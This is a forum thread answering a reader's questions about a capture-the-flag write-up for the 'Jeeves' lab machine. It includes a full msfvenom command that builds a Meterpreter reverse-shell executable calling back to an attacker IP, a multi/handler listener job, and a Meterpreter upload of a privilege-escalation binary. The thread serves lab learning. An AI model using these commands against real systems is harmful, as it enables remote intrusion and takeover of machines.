Jeeves Writeup by OnlyaMedic

Tutorials Writeups
, , ,
6

@onlyamedic said:

@witness2pro said:
Thanks for writing this walkthrough. This is the only walkhrough that talks about using Windows Exploit Suggester that I can find so I am keen to learn how to make it work.

No problem! Thanks for reading.

* What code was used to make		8383.exe		?

That is a meterpreter reverse shellwindows/meterpreter/reverse_tcp generated with the tool msfvenom. This tool is installed by default on kali & is a component of the metasploit framework.

example command:

root@dastinia:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.151 LPORT=31337 -f exe > win_meterp_31337.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
  • In the jobs section in msfconsole , you have
    1 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://10.10.14.32:8383
    Is that needed for getting to root?

Not necessarily, I opted to use the metasploit framework to catch shells for this box for convenience sake. In the metasploit framework the jobs command lets you know what tasks the framework is running in the background. See this link: Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec

  • How did you get meterpreter to upload this?
    meterpreter > upload /opt/serve/windows/priv/rottenpotato.exe
    I mean , how did you arrive at meterpreter ? What payload did you use to arrive at meterpreter ?

If you have a meterpreter shell you can upload files from your local system
to the remote victim machine with the upload command. (see this link Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec)

To get that meterpreter shell, I uploaded & executed the 8383.exe executable which was a meterpreter shell that I generated with msfvenom from before.

Let me know if that helps.

Thanks a million for such a helpful and fast response. You are the best. And yes, I have looked at almost 20 Jeeves walkthroughs and yours is the only one that bothers with using Windows Exploit Suggester.

Even IppSec failed to explain why he did not bother with Windows Exploit Suggester or equivalent, a tool that I thought is one of the first tools that comes to mind when dealing with Windows boxes.